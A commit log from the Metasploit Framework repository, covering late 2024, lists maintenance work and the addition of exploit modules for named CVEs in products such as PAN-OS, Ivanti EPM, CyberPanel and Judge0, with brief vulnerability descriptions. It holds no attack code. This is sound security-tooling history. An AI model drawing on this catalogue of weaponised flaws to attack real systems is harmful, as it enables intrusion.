24d3ef16cf
Remove some unnecessary code, switch to passive stance
2024-11-21 15:08:43 -05:00
jenkins-metasploit
d75ed350db
automatic module_metadata_base.json update
2024-11-21 17:59:45 +00:00
jheysel-r7
d95d549992
Land #19531 ProjectSend r1335 - r1605 RCE module
2024-11-21 09:53:36 -08:00
sfewer-r7
41bcf4629f
The payload we essentially being encoded twice (thanks for calling this out Brendan), we now supply a suitable BadChars and let the framewrk encode the framework paylaod. We rename the variable payload to bootstrap_payload as this was colliding with the frameworks payload variable which was not the intent.
2024-11-21 17:37:34 +00:00
ostrichgolf
68eb6599fd
Create projectsend_unauth_rce
2024-11-21 09:34:58 -08:00
sfewer-r7
d2f6e0e10f
As the payload option FETCH_WRITABLE_DIR may not be available if a non fetch based payload is used, we add a new option WRITABLE_DIR to account for this. Update the documentation to reflect the change.
2024-11-21 16:38:09 +00:00
sfewer-r7
f9b099a46d
remove the DefaultOption PAYLOAD value, and let the framework pick one for us. Mention I tested the exploit with cmd/linux/http/x64/meterpreter_reverse_tcp
2024-11-21 16:22:02 +00:00
sfewer-r7
d40bbd047e
remove the DefaultOption FETCH_COMMAND value of WGET, as the default the framework will pick, CURL, will work great.
2024-11-21 16:21:00 +00:00
Stephen Fewer
b8f36628da
remove an unnecessary space in the command to write a chunk to disk.
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-11-21 16:08:33 +00:00
Stephen Fewer
077f8700b9
remove an unnecessary space in this command.
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-11-21 16:08:09 +00:00
jenkins-metasploit
b79c0037f6
automatic module_metadata_base.json update
2024-11-21 12:42:37 +00:00
adfoster-r7
d9d7f1a898
Merge pull request #19654 from h00die/strapi
...
strapi 3.0.0 beta 17.4 password reset (CVE-2019-18818)
2024-11-21 12:35:30 +00:00
h00die
0f6da56a52
vcenter sudo module
2024-11-21 04:34:15 -05:00
Metasploit
bc7adfbe41
Bump version of framework to 6.4.38
2024-11-21 03:32:51 -06:00
Ashley Donaldson
469671e59d
Added LDAP password change module
2024-11-21 17:34:21 +11:00
h00die
4ff389762d
xspy updates
2024-11-20 19:35:19 -05:00
jenkins-metasploit
3419bfec43
automatic module_metadata_base.json update
2024-11-20 22:41:34 +00:00
jheysel-r7
afbbba09e8
Land #19584 Judge0 sandbox escape CVE-2024-28185, CVE-2024-28189
2024-11-20 14:35:38 -08:00
Takah1ro
da6f8cd552
Add Judge0 module and document
2024-11-20 14:15:38 -08:00
Ashley Donaldson
1a20bed286
Option description fix
2024-11-21 07:48:53 +11:00
jenkins-metasploit
d69c146fb0
automatic module_metadata_base.json update
2024-11-20 19:26:21 +00:00
jheysel-r7
05cbd1d9a3
Land #19593 Add exploit for CVE-2023-28324 (Unauthenticated RCE in Ivanti EPM)
...
This exploits an unauthenticated RCE in Ivanti's EPM where a .NET remoting client can invoke a method that results in an OS command being executed in the context of NT AUTHORITY\SYSTEM.
2024-11-20 11:18:58 -08:00
Spencer McIntyre
e52edf447c
Implement feedback from the PR
2024-11-20 13:51:39 -05:00
Ashley Donaldson
4766976463
Removed executable status
2024-11-20 17:06:53 +11:00
Ashley Donaldson
cec793f8f5
Msftidy changes
2024-11-20 16:09:21 +11:00
Ashley Donaldson
afc735f4a4
Add documentation
2024-11-20 15:36:36 +11:00
Ashley Donaldson
1ca32eea7e
Implement Reset NTLM behaviour.
2024-11-20 15:00:56 +11:00
Ashley Donaldson
8158cf5bae
Add Reset and Change_NTLM actions
2024-11-20 12:13:41 +11:00
sfewer-r7
2469d4ea23
add in exploit module for the recent PAN-OS RCE, CVE-2024-0012 + CVE-2024-9474
2024-11-19 16:15:06 +00:00
adfoster-r7
e6615d3a74
Merge pull request #19659 from sjanusz-r7/fix-irb-deadlock-error
...
Fix IRB deadlock recursive locking on Ctrl+C
2024-11-19 16:11:09 +00:00
jenkins-metasploit
1d7e6050d3
automatic module_metadata_base.json update
2024-11-19 16:05:05 +00:00
Spencer McIntyre
f7e210d3e9
Merge pull request #19624 from cdelafuente-r7/fix/mod/ms_icpr
...
Fix a crash when generating CSRs with OpenSSL 3.4.0
2024-11-19 10:58:52 -05:00
bwatters-r7
441a3215b2
Catch up to head on other branch
2024-11-19 08:59:22 -06:00
adfoster-r7
09db1811f1
Merge pull request #19662 from sjanusz-r7/fix-no-readline-crash
...
Load Readline without a conditional
2024-11-19 13:25:41 +00:00
sjanusz-r7
523a172e23
Load Readline without a conditional
2024-11-19 13:02:06 +00:00
adfoster-r7
e199dd7ca7
Merge pull request #19657 from sjanusz-r7/deprecate-real-readline
...
Deprecate real-readline option
2024-11-19 12:50:15 +00:00
sjanusz-r7
fefc8438f5
Deprecate real-readline option
2024-11-19 12:38:05 +00:00
Ashley Donaldson
479078a5f2
Adding changing/resetting password module
2024-11-19 17:44:59 +11:00
h00die
6bd049e346
operator working
2024-11-18 20:09:13 -05:00
gardnerapp
19770cf870
Remove unneeded file and rudocop corrections
...
Update modules/exploits/linux/local/gameoverlay_privesc.rb
Co-authored-by: Brendan <bwatters@rapid7.com >
Give bwatters7 credit, add docs
Experiment with randomized bash copy and Rex::File.join
remove unused line
Add missing parenthesis
fix problem with bash copy
Remove rex::join, call proper method for generating payload
add exploit::exe mixin, bash copy randomization
Rubocop changes
Remove nc
2024-11-18 17:01:08 -06:00
gardnerapp
6e09722f67
Rubocop changes and arch tracking for payload
...
Update modules/exploits/linux/local/gameoverlay_privesc.rb
Co-authored-by: Brendan <bwatters@rapid7.com >
Rubocop changes
2024-11-18 16:59:37 -06:00
gardnerapp
c6425f7245
Break out command building to make it easier to read
...
Update modules/exploits/linux/local/gameoverlay_privesc.rb
Co-authored-by: Brendan <bwatters@rapid7.com >
2024-11-18 16:58:56 -06:00
gardnerapp
e506c34e13
Update modules/exploits/linux/local/gameoverlay_privesc.rb
...
Co-authored-by: Brendan <bwatters@rapid7.com >
2024-11-18 16:57:17 -06:00
gardnerapp
883a0f8985
Update modules/exploits/linux/local/gameoverlay_privesc.rb
...
Co-authored-by: Brendan <bwatters@rapid7.com >
2024-11-18 16:57:17 -06:00
gardnerapp
51194ad0c9
Rebase and maintain authorship
...
Rebase and change payload delivery
Rebase and remove cmdstager
Update modules/exploits/linux/local/game_overlay_privesc.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
remove CmdStager Mixin
Add PrependSetuid
Remove python from exploit
Remove generate_payload_exe and add dynamic directory to upper mount layer
Change where payload is dropped
Remove FileUtils module
Call proper method for generating payload
Seperate exploit and triggering of payload
Seperate exploit and triggering payload
test
2024-11-18 16:55:59 -06:00
gardnerapp
c927f22d66
Update modules/exploits/linux/local/game_overlay_privesc.rb
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-11-18 16:44:33 -06:00
Corey
5edec2525f
Rebase and Squash
...
init
Add moduel scaffolding
Add Opts, check and exploit methods
Rubocop changes
Add checks for vunerable kernel versions
Write check for distro type
Finish protoype of check add exploit
Make changes to check method
Add checkcode
Add x86 for payload compatability
remove check, add kernel version
add codenam, transform keys in vuln
Note
minor spelling change
Add description
Add cve references
Start trying to drop payloads on disk
Change description, include modules for file upload, use proper methods for writing payload
continue trying to upload
Use write_file instead of upload_and_chmodx
remove upload_dir opt
expirement w g1vi exploit
Include cmd_stage module, add generate_payload_exe, run payload in new namespace
Add missing call to setcap, fix description
Fix unterminated string, fix directory for calling python copy
Rubocop changes
Create dynamic payload
Add mkdir_p and WritableDir opts
Update modules/exploits/linux/local/game_overlay_privesc.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
Revert back to python exploit, add dynamic writable dir
Add todos
Remove FileUtils
Change module name
Add checkcodes
Add more checkcodes
2024-11-18 16:41:38 -06:00
Christophe De La Fuente
519c18a858
Update specs for auxiliary/admin/dcerpc/icpr_cert
2024-11-18 21:28:55 +01:00
Spencer McIntyre
96a7a3269e
Make enum options case normalizing
2024-11-18 14:20:14 -05:00
jenkins-metasploit
2177fdadbd
automatic module_metadata_base.json update
2024-11-18 16:32:34 +00:00
Christophe De La Fuente
7bab1c1980
Fix specs and add algorithm argument
2024-11-18 17:17:58 +01:00
adfoster-r7
1ed2d7e258
Merge pull request #19658 from cdelafuente-r7/fix/mod/get_ticket/file_read
...
Fix `auxiliary/admin/kerberos/get_ticket` issue on Windows
2024-11-18 16:08:27 +00:00
sjanusz-r7
bc45734fed
Fix IRB deadlock recursive locking on Ctrl+C
2024-11-18 14:37:01 +00:00
jenkins-metasploit
26e424a921
automatic module_metadata_base.json update
2024-11-18 14:32:24 +00:00
Christophe De La Fuente
2970c99471
Use binread instead
2024-11-18 15:32:08 +01:00
Spencer McIntyre
dd7e1786e1
Merge pull request #19643 from smashery/dcsync_individual
...
DCsync individual accounts and groups
2024-11-18 09:25:21 -05:00
Christophe De La Fuente
7c512b7054
Read the certificate in binary mode
2024-11-18 15:11:36 +01:00
h00die
f38661d6c3
pod user working
2024-11-18 07:30:21 -05:00
sfewer-r7
4856817131
fix a typo
2024-11-18 09:44:53 +00:00
Ashley Donaldson
20b8fc61a8
Updated ruby_smb module with SAMR group membership query ability
2024-11-18 10:08:00 +11:00
sjanusz-r7
358e79bd3c
Handle SSH errors by closing the session
2024-11-17 14:53:42 +00:00
sjanusz-r7
f6a51610ad
Add handle_error to command_stream
2024-11-17 14:25:22 +00:00
h00die
dfebca457c
strapi review
2024-11-16 15:47:54 -05:00
h00die
219981227d
Update documentation/modules/auxiliary/scanner/http/strapi_3_password_reset.md
...
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com >
2024-11-16 15:36:00 -05:00
h00die
6629d5dff2
strapi password reset
2024-11-15 15:12:34 -05:00
sfewer-r7
c58dbbfb61
add in documentation
2024-11-15 17:42:57 +00:00
sfewer-r7
feb1ac79da
add in a suitable certificate and private key to use by default.
2024-11-15 17:41:31 +00:00
jenkins-metasploit
acc9940cdb
automatic module_metadata_base.json update
2024-11-15 14:30:41 +00:00
Spencer McIntyre
5d9add4450
Merge pull request #19640 from jheysel-r7/pyload_js2py_cve_2024_39205
...
Pyload RCE (CVE-2024-39205) with js2py sandbox escape (CVE-2024-28397)
2024-11-15 09:24:37 -05:00
jenkins-metasploit
786e8551ee
automatic module_metadata_base.json update
2024-11-15 12:55:28 +00:00
adfoster-r7
d039bead93
Merge pull request #19601 from sjanusz-r7/add-teamcity-login-scanner
...
Add JetBrains TeamCity HTTP Login Scanner
2024-11-15 12:49:10 +00:00
sfewer-r7
e520ca7ee9
comment the intent of this code block
2024-11-15 12:29:31 +00:00
sfewer-r7
2ec5778405
get_cert_subject_item may return nil, so test for that here
2024-11-15 12:28:25 +00:00
sfewer-r7
51ad7ad0bf
improve the send_packet logic to fail gracefully if bad data is recieved
2024-11-15 12:27:33 +00:00
Heyder Andrade
0f969f1dd6
Clean-up
2024-11-15 11:53:59 +01:00
sfewer-r7
c3bd4792ec
rename SSLClientCert and SSLClientKey to ClientCert and ClientKey. This then matcheds up with ClientSerialNumber and ClientPlatform, which is clearer IMHO. Also, we explicitly create a Rex TCP socket, so these param names no longer collide with what a mixin would use
2024-11-15 09:44:50 +00:00
sfewer-r7
6eb15d5b66
add a helper method get_cert_subject_item
2024-11-15 09:42:59 +00:00
sfewer-r7
91587ce30b
this message can be on a single line
2024-11-15 09:42:06 +00:00
sfewer-r7
e89c27fa3b
fix some typos. Make msftidy happy. Add comments to the external references.
2024-11-15 08:54:32 +00:00
Arne De Herdt
de39b693b7
Merge pull request #19645 from adeherdt-r7/MS-9862-rails-upgrade-preparation-migration-manager
...
MS-9862 Ruby on Rails Upgrade Preparation : Migration
2024-11-15 08:44:05 +01:00
Ashley Donaldson
9bd27e431d
Give specific version details when the version matches perfectly
2024-11-15 14:54:57 +11:00
Ashley Donaldson
717940590a
Clearer datastore option description
2024-11-15 11:11:41 +11:00
dwelch-r7
9409749a21
Land #19650 , Fix crash when using modules
2024-11-14 21:26:46 +00:00
adfoster-r7
6be0182b1f
Fix crash when using modules
2024-11-14 21:19:41 +00:00
Jack Heysel
92e42a63ea
Rubocop
2024-11-14 12:47:35 -08:00
Jack Heysel
4e1f33336c
Ofuscation and Gemfile update
2024-11-14 12:44:19 -08:00
h00die
6962d828ac
primefaces exploit v2
2024-11-14 14:14:02 -05:00
h00die
7a8e72f9b8
primefaces exploit v1
2024-11-14 14:12:13 -05:00
sfewer-r7
47f924bb8f
add in the initial work on the FortiManager exploit.
2024-11-14 18:53:12 +00:00
Jack Heysel
526451fed5
Responded to comments
2024-11-14 10:46:11 -08:00
Spencer McIntyre
d2ee472e31
Merge pull request #19185 from dwelch-r7/display-current-action-on-module-load
...
Display current action on module load
2024-11-14 12:49:57 -05:00
Heyder Andrade
09d84eaabb
Added module for WSO2 API Manager Documentation File Upload Remote Code Execution
...
Closes #19646
on-behalf-of: @redwaysecurity <info@redwaysecurity.com >
2024-11-14 18:34:11 +01:00
Arne De Herdt
b80bd252a8
MS-9862 Ruby on Rails Upgrade Preparation : Migration
...
Updating the logic in the `Msf::DbManager::Migration` to adhere to modern Rails standards and no longer manually control the connection. The connection pool and handling is fully controlled by ActiveRecord, which has a better understanding of what needs to be done than we do.
2024-11-14 11:37:54 +01:00
adfoster-r7
4c659ed13d
Merge pull request #19644 from adeherdt-r7/MS-9682-rails-upgrade-preparation-workflows
...
MS-9682 Rails Upgrade Preparation: Workflows
2024-11-14 10:06:41 +00:00
Arne De Herdt
fe4d5aff74
MS-9682 Rails Upgrade Preparation: Workflows
...
Updating the workflows to accommodate the required changes for the Ruby on Rails 7.1 upgrade.
This increases the timeout settings and changes the healthcheck command to properly use the correct account and reduce the noise level in the logs.
2024-11-14 09:39:19 +01:00
Ashley Donaldson
715fa3c559
Msftidy fixes
2024-11-14 17:58:00 +11:00
Ashley Donaldson
3e3e81ff22
Update documentation with new datastore options
2024-11-14 15:15:06 +11:00
Ashley Donaldson
67c33fa95f
Fix bug: DCSync only once, rather than once per DC that exists in the domain
...
- Also only DCSync each user once (if they're specified multiple times in KRB_USERS)
- Also be resilient to spaces in the comma-sepration
2024-11-14 15:13:59 +11:00
Jack Heysel
2ba8a6c08d
Responded to comments
2024-11-13 17:23:08 -08:00
Metasploit
67e27c60ef
Bump version of framework to 6.4.37
2024-11-13 18:39:19 -06:00
Jack Heysel
497ce5e9da
Linting and Rex::RandomIdentifier update
2024-11-13 08:28:52 -08:00
jenkins-metasploit
ec8778b4c9
automatic module_metadata_base.json update
2024-11-13 15:58:04 +00:00
adfoster-r7
2a022b8215
Merge pull request #19635 from adfoster-r7/update-kerberos-enumusers-description
...
Update Kerberos enumusers description
2024-11-13 15:50:53 +00:00
adfoster-r7
5e5a5ce0a1
Merge pull request #19634 from adfoster-r7/update-readme-file
...
Update README file
2024-11-13 15:26:10 +00:00
Dean Welch
0d0631aa2a
Squash to a single line of output
2024-11-13 11:27:17 +00:00
Ashley Donaldson
1705203ad8
Support DCSyncing by group too
2024-11-13 17:22:11 +11:00
h4x-x0r
37c148cc7c
CVE-2024-47407
...
CVE-2024-47407
2024-11-13 03:55:17 +00:00
h4x-x0r
afdddf2e43
updated
2024-11-13 03:40:22 +00:00
Jack Heysel
d2ef3cb6a9
Pyload RCE (CVE-2024-39205) with js2py sandbox escape (CVE-2024-28397)
2024-11-12 16:05:07 -08:00
Metasploit
93fab6c26b
automatic module_metadata_base.json update
2024-11-12 17:19:17 -06:00
Brendan
19e182ce65
Land #19557 , Add Palo Alto Expedition RCE (CVE-2024-5910 & CVE-2024-9464) Module
...
Palo Alto Expedition RCE (CVE-2024-5910 & CVE-2024-9464) Module
2024-11-12 16:42:06 -06:00
Christophe De La Fuente
24e19e4ebb
Update the ESC8 relay module to use the new helper
...
It also fixes some unrelated minor issues found in the module and the documentation
2024-11-12 18:23:31 +01:00
Dean Welch
2c009d02f9
place current action display behind feature flag
2024-11-12 15:53:30 +00:00
Dean Welch
6018adbbb3
Display current action and number of available actions on module use
2024-11-12 15:53:30 +00:00
h4x-x0r
6f6f92823a
fixed typo
...
fixed typo
2024-11-12 15:15:15 +00:00
h4x-x0r
a09ca39dee
Update documentation/modules/exploit/linux/http/paloalto_expedition_rce.md
...
Co-authored-by: Brendan <bwatters@rapid7.com >
2024-11-12 09:03:51 -06:00
h4x-x0r
61486cd877
Update documentation/modules/exploit/linux/http/paloalto_expedition_rce.md
...
Co-authored-by: Brendan <bwatters@rapid7.com >
2024-11-12 09:03:35 -06:00
h4x-x0r
fb102ec409
Update modules/exploits/linux/http/paloalto_expedition_rce.rb
...
Co-authored-by: Brendan <bwatters@rapid7.com >
2024-11-12 09:03:22 -06:00
adfoster-r7
ffa12f6ba5
Update Kerberos enumusers description
2024-11-12 13:45:47 +00:00
adfoster-r7
a52a22f922
Update README file
2024-11-12 13:35:37 +00:00
Christophe De La Fuente
35bb832b7c
Add create_csr helper under Rex::Proto
...
Also update `ms_icpr.rb` to use it
2024-11-12 12:34:20 +01:00
Christophe De La Fuente
422ecd8d3f
Remove setting version for CSR
2024-11-12 12:34:20 +01:00
Ashley Donaldson
6c3e13a31f
Able to query just a subset of users
2024-11-12 17:04:40 +11:00
h4x-x0r
a80006933a
Merge pull request #2 from bwatters-r7/collab/pr/19557
...
Stage cmd payloads to a file before executing
2024-11-11 21:20:35 -06:00
Ashley Donaldson
d396d06e35
Enable adding Users, not just computers (if permissions allow)
...
Also added extra error handling for when password is wrong or expired
2024-11-12 12:33:29 +11:00
h00die
4ebc6f1ff1
peer review
2024-11-11 17:37:33 -05:00
h00die
594c3a82ea
peer review
2024-11-11 17:32:49 -05:00
remmons-r7
4951a9b24d
Create mDNS server.rb
2024-11-11 15:54:44 -06:00
remmons-r7
b712f9a745
Create cups_ipp_remote_code_execution.md
2024-11-11 15:53:14 -06:00
remmons-r7
720312ba1c
Create cups_ipp_remote_code_execution.rb
2024-11-11 15:51:09 -06:00
bwatters-r7
03928a56bd
Add staging file delete and code cleanup
2024-11-11 14:42:19 -06:00
Jack Heysel
27459bb10f
Updated docs
2024-11-11 12:40:56 -08:00
Jack Heysel
3068511b66
CVE-2023:4220: Chamilo v1.11.24 Unrestricted File Upload
2024-11-11 11:33:34 -08:00
adfoster-r7
88132657d2
Merge pull request #19628 from adfoster-r7/update-readme-steps
...
Update README
2024-11-11 17:07:53 +00:00
adfoster-r7
5c256798e3
Update README
2024-11-11 16:58:51 +00:00
adfoster-r7
cc92e62573
Merge pull request #19627 from adfoster-r7/update-readme
...
Update readme
2024-11-11 16:50:59 +00:00
adfoster-r7
c83c258221
Update readme
2024-11-11 16:30:39 +00:00
Spencer McIntyre
f16991af07
Merge pull request #19623 from adfoster-r7/fix-kerberos-cache-storage-exception
...
Fix Kerberos cache storage exception
2024-11-11 09:31:13 -05:00
adfoster-r7
2206b0c288
Merge pull request #19617 from sjanusz-r7/fix-shell-include
...
Check for nil res when setting echo shell
2024-11-11 10:23:15 +00:00
Ashley Donaldson
8891c56211
Give likely Windows versions for SMB v2-3
2024-11-11 14:00:53 +11:00
bwatters-r7
0308f46f74
Stage cmd payloads to a file before executing
2024-11-08 19:27:58 -06:00
adfoster-r7
abfc24efdc
Fix Kerberos cache storage exception
2024-11-08 11:25:28 +00:00
vultza
39243fc52f
minor fixes
2024-11-07 22:37:47 +00:00
Spencer McIntyre
03dc2317da
Merge pull request #19369 from Adithya2357/readme-update
...
Update README.md
2024-11-07 14:46:06 -05:00
adfoster-r7
3ccf18f8e9
Merge pull request #19610 from cgranleese-r7/fixes-report-summary
...
Updates report summary mixin with an additional fallback when finding creds
2024-11-07 19:24:40 +00:00
soroshsabz
f56a6d693d
Update Setting-Up-a-Metasploit-Development-Environment.md
2024-11-07 18:24:21 +03:30
soroshsabz
80067379a5
Update Setting-Up-a-Metasploit-Development-Environment.md
2024-11-07 18:22:37 +03:30
soroshsabz
b55903a75f
Update Setting-Up-a-Metasploit-Development-Environment.md
2024-11-07 18:06:44 +03:30
soroshsabz
51dda15b78
Update Setting-Up-a-Metasploit-Development-Environment.md
2024-11-07 17:54:37 +03:30
Spencer McIntyre
c98830834b
Merge pull request #19620 from dudu7615/Fixed-spelling-errors-in-command-usage
...
Fixed spelling errors in command usage
2024-11-07 09:14:32 -05:00
soroshsabz
c0fbba25f4
Update Setting-Up-a-Metasploit-Development-Environment.md
...
Add PowerShell based installation instructions
2024-11-07 16:48:02 +03:30
Metasploit
763793ee3d
Bump version of framework to 6.4.36
2024-11-07 03:35:44 -06:00
Jack Heysel
81b83f2fd6
Updated docs and check
2024-11-06 09:13:51 -08:00
cgranleese-r7
96f6f66429
Land #19550 , Fix username/password generation in case both PASSWORD_SPRAY and USER_AS_PASS are enabled
2024-11-06 13:56:05 +00:00
dudu
8ffa333a97
Fixed spelling errors in command usage
2024-11-06 20:38:51 +08:00
adfoster-r7
c27c943e40
Merge pull request #19619 from smashery/krb-etype-cache-regression
...
Fix out of scope variable with original behaviour
2024-11-06 11:25:48 +00:00
Ashley Donaldson
2470a45eb1
Fix out of scope variable with original behaviour
2024-11-06 18:33:34 +11:00
Jack Heysel
10cd8d1020
Removed unnecessary code from exploit.cpp
2024-11-05 15:47:52 -08:00
Jack Heysel
5bc3e046eb
Update check
2024-11-05 15:34:25 -08:00
Jack Heysel
7a5bc60aab
Windows Access Mode Mismatch LPE in ks.sys [CVE-2024-35250]
2024-11-05 15:31:44 -08:00
Metasploit
c250f8dfe1
automatic module_metadata_base.json update
2024-11-05 13:30:50 -06:00
Spencer McIntyre
e709a18128
Merge pull request #19404 from bwatters-r7/smb2http_relay
...
SMB to NTLM HTTP Relay with ESC8 module
2024-11-05 14:12:08 -05:00
sjanusz-r7
975c1ac71f
Check for nil res when setting echo shell
2024-11-05 13:31:07 +00:00
vultza
1348275ff7
fix lax check
2024-11-04 23:07:32 +00:00
h00die
0de93eedb7
asterisk ami auth rce
2024-11-04 16:27:58 -05:00
h00die
773355f0e8
making bcenter lpe progress
2024-11-04 16:26:08 -05:00
bwatters-r7
be21e2d4c6
Switch print to call out available templates
2024-11-04 13:37:23 -06:00
Brendan
096e86cdaa
Merge pull request #5 from zeroSteiner/pr/collab/19404
...
Pr/collab/19404
2024-11-04 12:39:00 -06:00
sjanusz-r7
68ec0c82f1
TeamCity: Lint
2024-11-04 16:58:32 +00:00
cgranleese-r7
145ab02f0c
Land #19573 , Update to Ruby 3.2
2024-11-04 16:37:29 +00:00
sjanusz-r7
520ac7ef2b
TeamCity: Correctly encrypt UTF-8 codepoints
2024-11-04 16:33:29 +00:00
sjanusz-r7
2073121f5e
TeamCity: Raise ArgumentError, refactor Crypto as an included module
2024-11-04 16:33:29 +00:00
sjanusz-r7
f82483ba1e
TeamCity: Initial TeamCity Crypto tests
2024-11-04 16:33:29 +00:00
sjanusz-r7
970beb4c27
TeamCity: Consolidate RSA crypto into login scanner
2024-11-04 16:33:29 +00:00
sjanusz-r7
a6ee189502
TeamCity: Use more exceptions, cache public key
2024-11-04 16:33:29 +00:00
sjanusz-r7
386441d3d2
TeamCity: Consolidate HTTP TeamCity into module
2024-11-04 16:33:29 +00:00
sjanusz-r7
c37f4e6508
TeamCity: Prevent endless recursion and stack explosions in try_login
2024-11-04 16:33:29 +00:00
sjanusz-r7
ed1a5d97c3
TeamCity: use vars_post for login request
2024-11-04 16:33:29 +00:00
sjanusz-r7
84cacb5cca
TeamCity: Fire and forget logout request
2024-11-04 16:33:28 +00:00
sjanusz-r7
ef51254fcd
TeamCity: Add maximum message size for string
2024-11-04 16:33:28 +00:00
sjanusz-r7
7c1692cb84
TeamCity: Modify authors
2024-11-04 16:33:28 +00:00
sjanusz-r7
9cb05efa27
TeamCity: use random padding bytes
2024-11-04 16:33:28 +00:00
sjanusz-r7
cba8962d29
Add JetBrains TeamCity HTTP Login Scanner
2024-11-04 16:33:28 +00:00
adfoster-r7
69dabe6817
Update to Ruby 3.2
2024-11-04 16:08:01 +00:00
vultza
c9e0668473
fixed double project name validation issue
2024-11-04 16:01:06 +00:00
vultza
3a90648c7a
update validation function and fix typo
2024-11-04 15:55:45 +00:00
Spencer McIntyre
e130092d87
Add a missing require statement
2024-11-04 09:37:12 -05:00
Spencer McIntyre
006ed90f1c
Move the ESC8 module and document the attack
2024-11-04 09:37:12 -05:00
Spencer McIntyre
7d8baee574
Add some error handling and more logging
2024-11-04 09:37:12 -05:00
Spencer McIntyre
80d883b55e
Consistently use strings for HTTP request options
2024-11-04 09:37:12 -05:00
Spencer McIntyre
4a4ec9aea4
Add some more logging
2024-11-04 09:37:12 -05:00
Spencer McIntyre
316a967414
Update the ESC8 module for the new changes
2024-11-04 09:37:08 -05:00
h00die
5d2bc4aa3c
add vcenter server appliance to ssh platform
2024-11-03 14:47:40 -05:00
h00die
8ba4332c33
Merge remote-tracking branch 'upstream/master' into vcenter_privesc
2024-11-03 13:56:14 -05:00
h00die
2b593bcf54
wp_post_smtp_acct_takeover peer review
2024-11-03 13:52:55 -05:00
vultza
a74e1678d9
fix path normalization and missing comma
2024-11-02 15:10:15 +00:00
vultza
8f2f0c7b37
typo on documentation
2024-11-02 15:08:37 +00:00
vultza
f0abc0da69
Add documentation
2024-11-02 00:47:32 +00:00
vultza
1e6bfb2af8
Add CVE-2024-45309
2024-11-02 00:47:15 +00:00
h00die
9cba5dad59
WIP for asterisk rce
2024-11-01 16:28:45 -04:00
adfoster-r7
f40e98616c
Merge pull request #19612 from rapid7/revert-19554-new-junction-test
...
Revert "Added new failing test for windows junction points"
2024-11-01 17:36:51 +00:00
adfoster-r7
9485cdd9a6
Revert "Added new failing test for windows junction points"
2024-11-01 17:19:39 +00:00
Valentin Lobstein
c1c9f6f7bb
Update modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-11-01 17:23:45 +01:00
Valentin Lobstein
5464e8c009
Update modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-11-01 17:23:35 +01:00
Spencer McIntyre
d9b3528d89
Merge pull request #19554 from smashery/new-junction-test
...
Added new tests for Windows junction points
2024-11-01 11:54:00 -04:00
Metasploit
1634cdc5cc
automatic module_metadata_base.json update
2024-11-01 10:29:21 -05:00
cgranleese-r7
dc6cb34a21
Updates report summary mixin to have additional fallback when looking for creds
2024-11-01 15:27:31 +00:00
Spencer McIntyre
3b0195918c
Merge pull request #19529 from NtAlexio2/pipe_dcerpc_auditor_rport
...
Allow settings the RPORT option for pipe_dcerpc_auditor
2024-11-01 11:11:45 -04:00
Valentin Lobstein
3e7aca2584
Update modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-11-01 15:46:26 +01:00
Valentin Lobstein
12abb50813
Update modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-11-01 15:46:14 +01:00
Valentin Lobstein
f85de40d58
Update documentation/modules/exploit/unix/webapp/cyberpanel_preauth_rce_multi_cve.md
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-11-01 15:46:05 +01:00
Graeme Robinson
f209316239
Update werkzeug_debug_rce.rb
...
Use percent strings for module description
2024-11-01 14:24:31 +00:00
Metasploit
ca9d0558f9
automatic module_metadata_base.json update
2024-11-01 06:29:40 -05:00
dwelch-r7
1bfa0755a8
Land #19518 , Add support for RISC-V 32-bit / 64-bit Little Endian payloads
2024-11-01 11:18:30 +00:00
Chocapikk
db8c0461b8
Remove timeout
2024-11-01 08:55:32 +01:00
Chocapikk
3723064ac9
Fix typo
2024-11-01 08:53:55 +01:00
Chocapikk
695feaa37e
Update comment
2024-11-01 08:50:04 +01:00
Chocapikk
616ffe7d18
Add CVE-2024-51568
2024-11-01 08:48:34 +01:00
Chocapikk
cdd3ef9bc5
Update description
2024-10-31 22:21:43 +01:00
Chocapikk
42980c235d
Update refs
2024-10-31 22:19:19 +01:00
Chocapikk
4269615400
Add CyberPanel Pre-Auth RCE Exploit Module for CVE-2024-51378 and CVE-2024-51567
2024-10-31 22:13:05 +01:00
Metasploit
9e0b0f565f
automatic module_metadata_base.json update
2024-10-31 15:34:25 -05:00
Brendan
ff521464f3
Land #19528 , Add Python exec payload
...
Add a python/exec payload to execute OS commands
2024-10-31 15:23:25 -05:00
Metasploit
4a59d3db34
automatic module_metadata_base.json update
2024-10-31 11:42:23 -05:00
jheysel-r7
ea45d83562
Land #19499 , Adds SolarWinds Help Desk Backdoor module
...
This adds a new module which exploits a backdoor in SolarWinds Web Help Desk (CVE-2024-28987) <= v12.8.3 which enables attackers to retrieve all tickets currently logged in the application.
2024-10-31 12:17:32 -04:00
jheysel-r7
2e8892cb01
Land #19517 , Add WooCommerce SQLi module
...
This adds a new auxiliary module that exploits an unauthenticated SQL injection vulnerability in the TI WooCommerce Wishlist plugin for WordPress (versions <= 2.8.2). The vulnerability allows attackers to execute SQL queries via the order parameter which can be used to dump usernames and their hashed passwords.
2024-10-31 12:09:55 -04:00
Jack Heysel
3456293da5
Lint
2024-10-31 11:56:55 -04:00
jheysel-r7
f01b01a62c
Update modules/auxiliary/scanner/http/wp_ti_woocommerce_wishlist_sqli.rb
2024-10-31 11:36:19 -04:00
Spencer McIntyre
5550e073dd
Implement suggested changes
2024-10-31 11:29:34 -04:00
jheysel-r7
f24c0148f8
Update modules/auxiliary/gather/solarwinds_webhelpdesk_backdoor.rb
2024-10-31 10:56:56 -04:00
Metasploit
ec013f2a73
Bump version of framework to 6.4.35
2024-10-31 09:14:41 -05:00
dwelch-r7
8b0acd2982
Land #19602 , Update build cache to run xargs in parallel
